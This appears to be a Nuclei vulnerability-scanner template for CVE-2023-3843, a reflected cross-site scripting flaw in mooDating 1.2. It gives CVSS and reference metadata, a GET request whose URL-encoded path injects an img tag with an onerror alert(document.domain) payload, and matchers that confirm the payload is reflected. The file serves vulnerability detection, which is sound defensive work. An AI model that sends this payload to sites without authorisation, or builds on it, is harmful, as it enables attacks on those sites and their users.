nuclei-templates/http/cves/2023/CVE-2023-3843.yaml

43 lines
1.8 KiB
YAML

id: CVE-2023-3843
info:
name: mooDating 1.2 - Cross-site scripting
author: r3Y3r53
severity: medium
description: |
A vulnerability was found in mooSocial mooDating 1.2. It has been classified as problematic. Affected is an unknown function of the file /matchmakings/question of the component URL Handler. The manipulation leads to cross site scripting. It is possible to launch the attack remotely. VDB-235194 is the identifier assigned to this vulnerability. NOTE: We tried to contact the vendor early about the disclosure but the official mail address was not working properly.
reference:
- https://www.exploit-db.com/exploits/51628
- https://nvd.nist.gov/vuln/detail/CVE-2023-3843
- https://vuldb.com/?ctiid.235194
- https://vuldb.com/?id.235194
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
cvss-score: 6.1
cve-id: CVE-2023-3843
cwe-id: CWE-79
epss-score: 0.00207
epss-percentile: 0.58545
cpe: cpe:2.3:a:moosocial:moodating:1.2:*:*:*:*:*:*:*
metadata:
verified: true
max-request: 1
vendor: moosocial
product: moodating
tags: cve,cve2023,xss,unauth,exploitdb,moodating
http:
- method: GET
path:
- "{{BaseURL}}/matchmakings/questiontmili%22%3E%3Cimg%20src%3da%20onerror%3dalert(document.domain)%3Ew71ch?number="
matchers:
- type: dsl
dsl:
- 'status_code == 404'
- 'contains(content_type, "text/html")'
- 'contains(body, "><img src=a onerror=alert(document.domain)>w71ch") && contains(body, "mooDating")'
condition: and
# digest: 490a004630440220534b440dfb14cbf3161b05f7bdce50d285d7d5fa2345882f8f7560082d52a0d3022017ce53c980f70682efb964ae774cb47d81796505f8ed8865999fe1ce6e761b08:922c64590222798bb761d5b6d8e72950